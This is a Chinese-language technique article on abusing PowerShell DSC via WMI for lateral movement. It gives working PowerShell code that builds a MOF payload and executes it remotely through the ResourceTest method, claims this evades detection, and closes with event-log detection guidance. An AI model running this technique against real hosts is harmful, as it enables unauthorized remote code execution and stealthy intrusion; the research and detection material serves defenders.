如何滥用PowerShell DSC进行横向渗透

 

一、基本描述

PowerShell的期望状态配置（Desired State Configuration，DSC）可以让我们使用WMI来直接执行资源。通过DSC WMI类，我们可以滥用内置的脚本资源来实现PowerShell代码的远程执行。这种横向渗透技术有如下几个有点：

1、PowerShell会在WMIC服务程序wmiprvse.exe的上下文环境中执行。传统的调用Win32_Process的Create方法会通过wmiprvse.exe创建子进程且带有命令行特征，因此从规避检测的角度来看，这种方法具备一定的优势（至少在本文发表以前）。

2、载荷的所有组件都仅依赖于WMI。

3、我们并不需要使用DSC服务的配置（甚至无需了解相关知识）。

 

二、具体需求

1、MSFT_DSCLocalConfigurationManager这个WMI类中必须存在ResourceTest方法，该类位于root/Microsoft/Windows/DesiredStateConfiguration命名空间中。注意：攻击者也可以选择调用ResourceGet或者ResourceSet方法。PowerShell DSC从PowerShell v4中开始引入，因此并非所有主机都可以使用这种技术。

2、默认情况下，我们必须具备管理员凭据才能远程调用WMI方法。在远程调用时，WMI受DCOM或者WSMan安全设置的保护。建立远程连接后，WMI本身通过与特定命名空间对应的安全描述符进行保护，在这种场景中，该命名空间为root/Microsoft/Windows/DesiredStateConfiguration。

 

三、PoC

第一个步骤是准备待执行的载荷。我们想在目标上执行的PowerShell代码必须采用MOF格式。在目标上执行的某个示例载荷如下所示：

$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = ""$(Get-Date): I am being GET"     | Out-File C:\Windows\Temp\ScriptRun.txt -Append; return $True";
    TestScript = ""$(Get-Date): I am being TESTED" | Out-File C:\Windows\Temp\ScriptRun.txt -Append; return $True";
    SetScript = ""$(Get-Date): I am being SET"     | Out-File C:\Windows\Temp\ScriptRun.txt -Append; return $True";
    SourceInfo = "::3::5::Script";
    ModuleName = "PsDesiredStateConfiguration";
    ModuleVersion = "1.0";
    ConfigurationName = "ScriptTest";
};

instance of OMI_ConfigurationDocument
{
    Version="2.0.0";
    MinimumCompatibleVersion = "1.0.0";
    CompatibleVersionAdditionalProperties= {"Omi_BaseResource:ConfigurationName"};
    Author="TestUser";
    GenerationDate="02/26/2018 07:09:21";
    GenerationHost="TestHost";
    Name="ScriptTest";
};
'@

实际上，这里我们所需修改的唯一特征就是PowerShell载荷。在我们的示例中，我们将调用ResourceTest方法，该方法对应的是TestScript属性中的载荷。需要注意的是我们需要转义处理特殊字符。MOF自动化生成及载荷转义处理是可以自动化完成的操作。

下一个步骤是将MOF转化为二进制形式（ResourceTest方法所期望的数据格式）：

# Change this to false if you want to test the payload locally
$ExecuteRemotely = $True

$NormalizedMOFContents = [Text.Encoding]::UTF8.GetString([Text.Encoding]::ASCII.GetBytes($MOFContents))
$NormalizedMOFBytes = [Text.Encoding]::UTF8.GetBytes($NormalizedMOFContents)
$TotalSize = [BitConverter]::GetBytes($NormalizedMOFContents.Length + 4)

if ($ExecuteRemotely) {
    # Prepend the length of the payload
    [Byte[]] $MOFBytes = $TotalSize + $NormalizedMOFBytes
} else {
    # If executing locally, you do not prepend the payload length
    [Byte[]] $MOFBytes = $NormalizedMOFBytes
}

在上述代码中需要注意的是，如果我们在本地测试载荷，则无需将载荷长度添加到byte数组中。现在我们已经正确编码载荷，接下来只需要在目标上执行载荷即可。

# Specify the credentials of your target
$Credential = Get-Credential -Credential TempUser
$ComputerName = 'TargetHost'

# Establish a remote WMI session with the target system
$RemoteCIMSession = New-CimSession -ComputerName $ComputerName -Credential $Credential

$LCMClass = Get-CimClass -Namespace root/Microsoft/Windows/DesiredStateConfiguration -ClassName MSFT_DSCLocalConfigurationManager -CimSession $RemoteCIMSession

if ($LCMClass -and $LCMClass.CimClassMethods['ResourceTest']) {
    # You may now proceed with lateral movement

    $MethodArgs = @{
        ModuleName       = 'PSDesiredStateConfiguration'
        ResourceType     = 'MSFT_ScriptResource'
        resourceProperty = $MOFBytes
    }

    $Arguments = @{
        Namespace  = 'root/Microsoft/Windows/DesiredStateConfiguration'
        ClassName  = 'MSFT_DSCLocalConfigurationManager'
        MethodName = 'ResourceTest'
        Arguments  = $MethodArgs
        CimSession = $RemoteCIMSession
    }

    # Invoke the DSC script resource Test method
    # Successful execution will be indicated by "InDesiredState" returning True and ReturnValue returning 0.
    Invoke-CimMethod @Arguments

} else {
    Write-Warning 'The DSC lateral movement method is not available on the remote system.'
}

在上述例子中，请注意我在执行之前首先验证了远程类以及方法是否存在。在使用WMI技术时，我建议大家在最终执行之前首先验证目标类和方法是否存在。

以上就是主要内容。我刻意介绍了个大概，在其他内容或者具体操作方面给大家留下较大空间。在这个例子中，载荷执行结果会在本地落盘。如果我们想通过WMI远程获取文件内容，可以参考此处介绍的方法。此外，在上述例子中，我使用了PSv3中才引入的CMI cmdlets，如果想兼容v2，大家也可以改造代码以适配老版WMI cmdlets。

 

四、发现过程

我是在学习DSC的基础知识时偶然发现了这种技术。我在网上找到了一篇文章，文中讨论了如何使用WMI来直接调用DSC资源。我对WMI有所了解，因此这篇文章一下子引燃了我对这方面内容的兴趣。该文章演示了如何调用内置的文件资源，因此我只需要澄清如何调整细节，以便适用于脚本资源即可。

 

五、检测方法

幸运的是，如果我们能够获取事件日志，那么就有很多机会可以检测到这类技术。

Microsoft-Windows-PowerShell/Operational事件日志

53504事件

PowerShell Named Pipe IPC事件将告诉我们已启动的PowerShell AppDomain的名称。当DSC执行脚本资源时，该事件会自动捕捉DscPsPluginWkr_AppDomain AppDomain，顾名思义，这是DSC执行所特有的名称。典型事件如下：

Windows PowerShell has started an IPC listening thread on process: 6480 in AppDomain: DscPsPluginWkr_AppDomain.

4104事件

该事件与PowerShell v5脚本块（ScriptBlock）日志有关。攻击者可以轻松规避ScriptBlock的自动日志机制，但如果启用了全局ScriptBlock日志，那么攻击者的载荷操作基本上都会被记录在案。ScriptBlock日志不仅会记录下执行的载荷，也会捕捉与执行内置脚本资源有关的帮助程序代码。

调用脚本资源时被捕捉到的一些ScriptBlock数据样例如下所示：

# Localized 04/11/2018 02:09 PM (GMT) 303:4.80.0411 MSFT_ScriptResourceStrings.psd1 # Localized MSFT_ScriptResourceStrings.psd1 ConvertFrom-StringData @' ###PSLOC SetScriptWhatIfMessage=Executing the SetScript with the user supplied credential InValidResultFromGetScriptError=Failure to get the results from the script in a hash table format. InValidResultFromTestScriptError=Failure to get a valid result from the execution of TestScript. The Test script should return True or False. ScriptBlockProviderScriptExecutionFailureError=Failure to successfully execute the script. GetTargetResourceStartVerboseMessage=Begin executing Get Script. GetTargetResourceEndVerboseMessage=End executing Get Script. SetTargetResourceStartVerboseMessage=Begin executing Set Script. SetTargetResourceEndVerboseMessage=End executing Set Script. TestTargetResourceStartVerboseMessage=Begin executing Test Script. TestTargetResourceEndVerboseMessage=End executing Test Script. ExecutingScriptMessage=Executing Script: {0} ###PSLOC '@

Windows PowerShell事件日志

400事件

在典型的PowerShell日志中，ID为400的事件表明系统中启动了一个新的PowerShell宿主进程。当DSC脚本资源执行时，会生成独特的事件日志条目，我们可以轻松定位。典型例子如下：

Engine状态从None变为Available。

Details: 
 NewEngineState=Available
 PreviousEngineState=None

 SequenceNumber=13

 HostName=Default Host
 HostVersion=5.1.17134.81
 HostId=19cfc50e-8894-4cd5-b0a9-09edd7785b7d
 HostApplication=C:Windowssystem32wbemwmiprvse.exe
 EngineVersion=5.1.17134.81
 RunspaceId=12ebba81-9b73-4b1e-975d-e2c16da30906
 PipelineId=
 CommandName=
 CommandType=
 ScriptName=
 CommandPath=
 CommandLine=

PowerShell宿主进程在wmiprvse.exe上下文中启动（参考HostApplication字段），这可能是环境中（特别是工作站上）非常独特的一个特征。

Microsoft-Windows-DSC/Operational事件日志

4102事件

该事件表明某个DSC资源被发送到某个表上。该事件可以为我们提供执行DSC资源的用户SID以及来源主机信息（如果主机位于域环境中）。典型事件如下所示：

Job {893F64B5-ABBF-11E8-B005-D336977413FC} : 
Operation Invoke-DscResource started by user sid S-1-5-21-3160353621-618008412-2361186285-1001 from computer NULL.

 

六、总结

我录制了一个视频，演示了如何使用DSC进行横向渗透，以及如何仅依赖WMI来远程获取文件内容。

大家可以访问此处下载演示代码，祝大家玩得开心。